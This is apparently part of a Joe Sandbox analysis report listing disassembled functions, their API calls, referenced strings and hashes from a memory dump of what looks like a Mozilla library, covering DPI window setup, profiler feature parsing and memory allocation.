Instruction ID: a6b6ccc1b9b5c11cf5d9d8c0b4c60bcc8cf5f6948b88949e5dd166c71c2ac321
Opcode Fuzzy Hash: 858b7335669777fbcddb25a8431ccfd8ac8cf1ed17db213ee85d151683458ff8
Instruction Fuzzy Hash: 37C1BD71E00319CBDB14CFA8C894BEEB7B6AB84318F144529D405ABB81D7B8AD49CF95

Function 6C5CD4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

-, xrefs: 6C5CD7DD
@, xrefs: 6C5CDAF6
0, xrefs: 6C5CDC7F
9, xrefs: 6C5CDE7F
, xrefs: 6C5CDA88
8, xrefs: 6C5CDC08
0, xrefs: 6C5CD852
1, xrefs: 6C5CDBDD

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: e87498201f0b0d893954415be5dd9bc969621e6cfeda3e83f4ef611707e00ec6
Instruction ID: adc9b12200336557db5a61545e90a91351b0bd6fb09d3cfb7affbf44b336df61
Opcode Fuzzy Hash: e87498201f0b0d893954415be5dd9bc969621e6cfeda3e83f4ef611707e00ec6
Instruction Fuzzy Hash: 1362BD7578C3458FD701CE99C8D076ABBF2AF86358F184A0DE8D58BA91D3359885CB83

Function 6C63545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C638A4B

Strings

~q\l, xrefs: 6C639459, 6C639269, 6C63921F, 6C635740, 6C635703, 6C6356C7, 6C63948F

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memset
String ID: ~q\l
API String ID: 2221118986-2912761343
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 23e043e57dc217da980821c20eb9e39ac25a4ca704f9ada4a9d1895217c2ff4a
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: C3B1D572A0422A8FDB14CE68CC907D9B7B2EF85314F1822AAC54DDB791D730A985CB94

Function 6C63542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6388F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C63925C

Strings

~q\l, xrefs: 6C639459, 6C639269, 6C63921F, 6C635740, 6C635703, 6C6356C7, 6C63948F

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memset
String ID: ~q\l
API String ID: 2221118986-2912761343
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 0a84fddbd78b354d0c553af492b182b6f2fc5916700281fe00f5931bf5ec5a11
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 2BB1D672E0421ACFDB14CF58CC816EDB7B2EF85314F14126AC949EB795D730A989CB94

Function 6C5CBEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C5CC1CB
__aulldiv.LIBCMT ref: 6C5CC24C
__aulldiv.LIBCMT ref: 6C5CC348
__aullrem.LIBCMT ref: 6C5CC365
__aulldiv.LIBCMT ref: 6C5CC37D

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: ea6ae62909d3425e6ea4dea8262ff3b59d98889c543917d1d194f0f21c1b5e35
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: B7322532B046118FC718DE6CC890A5ABBE6AFC9310F09867DE895DB395D734ED05CB91

Function 6C606CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C606D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C606E1E

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: 9a5322796db00c5436d4d71ef8217100cbea9abd617bdd2e7fdec6a9f97f10ff
Instruction ID: 6f1aada7e48c7730b00fd70403c2b65579dce0f29b24559aed90b62e0cae2127
Opcode Fuzzy Hash: 9a5322796db00c5436d4d71ef8217100cbea9abd617bdd2e7fdec6a9f97f10ff
Instruction Fuzzy Hash: F7A180706183818FC719CF25C5907AEFBE2BF89308F44491DE88A97B51DB70E849CB96

Function 6C5E4640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C5E4777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5E5585, 6C5E55A8, 6C5E55C3, 6C5E5624

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: 3c81075037418990854b9400eb71c81a07b40d6921a129d3cb5fb1407638eb77
Instruction ID: 688bc510daeede934bc06b079bcbd8018d85cdba05cd1fb451d4dcb8abf40aa1
Opcode Fuzzy Hash: 3c81075037418990854b9400eb71c81a07b40d6921a129d3cb5fb1407638eb77
Instruction Fuzzy Hash: FEB24C71A057018FD708CF19C990615BBE2BFC9328F29C7ADE46A8B7A5D771E841CB81

Function 6C6285F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C628C7C
__aulldiv.LIBCMT ref: 6C628DD7

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 19ffe008ecafb52648a9776aebf0e11e60013f91cc70665a021739d132c0b744
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 7E327372F011198BDF18CE9CC8A1BAEB7B2FB88304F15853AD506BB7A0D6385D458F95

Function 6C6376E3 Relevance: 1.8, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

~q\l, xrefs: 6C637E0B, 6C63793C, 6C637796, 6C6379C0, 6C637B0B, 6C6379FB

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID:
String ID: ~q\l
API String ID: 0-2912761343
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: 8b3aee515b7aec1e21211c5421b396390ef2946d6474ce8363091e56ca218689
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: E3320871E00629CFCB14CF98C990A9DF7F2BF88308F549169C949A7745D731A986CF94

Function 6C636E63 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

~q\l, xrefs: 6C637E0B, 6C63793C, 6C637C72, 6C6379C0, 6C637C03, 6C637B0B, 6C6379FB

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID:
String ID: ~q\l
API String ID: 0-2912761343
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: 914340d79fd6a158429c4a727edae85139db6b746516b631a2b629be3e0283cd
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: F822D771E00229CFDB14CF98C980A9DF7F2BF89304F6491AAC549A7745D731A986CF94

Function 6C605C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C5D4A63,?,?), ref: 6C605F06

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 52f0fd8201af3482fae850519b85c674c2db3986549c8bf5f4599487d02f73ed
Instruction ID: 68341ea4aced98efbe536f7db206bc722c2521dc640a5740f907d79e7ea94445
Opcode Fuzzy Hash: 52f0fd8201af3482fae850519b85c674c2db3986549c8bf5f4599487d02f73ed
Instruction Fuzzy Hash: 79C19E75E012098BCB08CF55C6906DEBBF2FF8A318F288159D8557BB44D731A806CF98

Function 6C5F0512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 3945af931951f740eaf189df7d3033ed920ecd74ef54b6a6e6def6ac4bccceca
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: 4B222875E00619CFDB18CF98C890AADF7B2FF88304F588699C45AA7745D770A986CF90

Function 6C63AC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e4b758ba90b277adb51f8cf46a08b64a47432b1e657a7b1a02790b47ab8714
Instruction ID: bb68ae06108836c480beb54ce5e8cc186aaef97af16b4e23b263b537b81c23f3
Opcode Fuzzy Hash: c0e4b758ba90b277adb51f8cf46a08b64a47432b1e657a7b1a02790b47ab8714
Instruction Fuzzy Hash: 24F16B71A087554FDB00CE68C8807AAB7E2AFC6318F15BA1DE4D8877C2E374D8459796

Function 6C5CC670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: c905c75cdbf882fae34d2adaaf600d87b122e757dd3fd2a1cd698485a536b837
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: 2AA19071F0061A8BDB08CEA9C8913AEB7F2EFC9354F18812DD915E7781D734AC068B91

Function 6C6255F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C5FE1A5), ref: 6C625606
LoadLibraryW.KERNEL32(gdi32,?,6C5FE1A5), ref: 6C62560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C625633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C62563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C62566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C62567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C625696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6256B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6256CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6256E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6256FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C625716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C62572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C625748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C625761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C62577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C625793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6257A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6257BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6257D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6257EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6257FF

Strings

gdi32, xrefs: 6C62560A
AreDpiAwarenessContextsEqual, xrefs: 6C625637
GetWindowDC, xrefs: 6C625710
GetMonitorInfoW, xrefs: 6C6257A2
SetWindowLongPtrW, xrefs: 6C6257B7
DeleteObject, xrefs: 6C6257F9
LoadIconW, xrefs: 6C62575B
GetDpiForWindow, xrefs: 6C625690
MonitorFromWindow, xrefs: 6C62578D
GetThreadDpiAwarenessContext, xrefs: 6C62562D
CreateSolidBrush, xrefs: 6C6257E4
ShowWindow, xrefs: 6C6256DE
StretchDIBits, xrefs: 6C6257CC
FillRect, xrefs: 6C625729
EnableNonClientDpiScaling, xrefs: 6C625666
GetSystemMetricsForDpi, xrefs: 6C625677
user32, xrefs: 6C625601
LoadCursorW, xrefs: 6C625774
RegisterClassW, xrefs: 6C6256AC
CreateWindowExW, xrefs: 6C6256C5
ReleaseDC, xrefs: 6C625742
SetWindowPos, xrefs: 6C6256F7

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 68870181e7c17f378a9d2c322bba0a5ffcaade0fc7338bb7e1458283a2a12dc5
Instruction ID: cba89f1ec1eb1670f240a34d2a03f70f92a1dc0406add6d97c23997835cd278d
Opcode Fuzzy Hash: 68870181e7c17f378a9d2c322bba0a5ffcaade0fc7338bb7e1458283a2a12dc5
Instruction Fuzzy Hash: 0C515A707117129BDB10AF3A8D84D2A3AF8EB9638DF50D425E921D2A55EF78C801CF6D

Function 6C60CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C5D582D), ref: 6C60CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C5D582D), ref: 6C60CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C63FE98,?,?,?,?,?,6C5D582D), ref: 6C60CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C5D582D), ref: 6C60CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C5D582D), ref: 6C60CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C5D582D), ref: 6C60CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5D582D), ref: 6C60CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C60CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C60CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C60CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C60CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C60CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C60CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C60CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C60CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C60CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C60CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C60CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C60CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C60CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C60CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C60CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C60CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C60CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C60CE8A

Strings

samplingallthreads, xrefs: 6C60CE2C
unregisteredthreads, xrefs: 6C60CE58
fileio, xrefs: 6C60CC92
java, xrefs: 6C60CC37
notimerresolutionchange, xrefs: 6C60CE00
preferencereads, xrefs: 6C60CD92
screenshots, xrefs: 6C60CCD4
cpuallthreads, xrefs: 6C60CE16
ipcmessages, xrefs: 6C60CDBE
seqstyle, xrefs: 6C60CCE6
fileioall, xrefs: 6C60CCA8
markersallthreads, xrefs: 6C60CE42
jsallocations, xrefs: 6C60CD0E
mainthreadio, xrefs: 6C60CC7C
noiostacks, xrefs: 6C60CCBE
processcpu, xrefs: 6C60CE6E
nostacksampling, xrefs: 6C60CD7C
Unrecognized feature "%s"., xrefs: 6C60CEA0
leaf, xrefs: 6C60CC66
nativeallocations, xrefs: 6C60CDA8
stackwalk, xrefs: 6C60CCF8
power, xrefs: 6C60CE84
default, xrefs: 6C60CC21
audiocallbacktracing, xrefs: 6C60CDD4

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: f024ef2f86313e23e549c01f220e9acb0c1546119d6e5f6d12020b380653de6b
Instruction ID: 0157032341d49200f80903b149b0c9f35765b3cae3350caac7a101b7dc0dce10
Opcode Fuzzy Hash: f024ef2f86313e23e549c01f220e9acb0c1546119d6e5f6d12020b380653de6b
Instruction Fuzzy Hash: F05156C1B4563572FA0931156E20BAA1485EF6334AF107539EE0FB5EC0FB059A1AC9BF

Function 6C5D4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5D4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C5D44B2,6C64E21C,6C64F7F8), ref: 6C5D473E
Part of subcall function 6C5D4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C5D474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C5D44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C5D44D2
InitOnceExecuteOnce.KERNEL32(6C64F80C,6C5CF240,?,?), ref: 6C5D451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C5D455C
LoadLibraryW.KERNEL32(?), ref: 6C5D4592
InitializeCriticalSection.KERNEL32(6C64F770), ref: 6C5D45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C5D45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C5D45BB
InitOnceExecuteOnce.KERNEL32(6C64F818,6C5CF240,?,?), ref: 6C5D4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C5D4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C5D4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C5D466D
VerSetConditionMask.NTDLL ref: 6C5D469F
VerSetConditionMask.NTDLL ref: 6C5D46AB
VerSetConditionMask.NTDLL ref: 6C5D46B2
VerSetConditionMask.NTDLL ref: 6C5D46B9
VerSetConditionMask.NTDLL ref: 6C5D46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5D46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C5D46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C5D46FD

Strings

Gdl, xrefs: 6C5D44FC
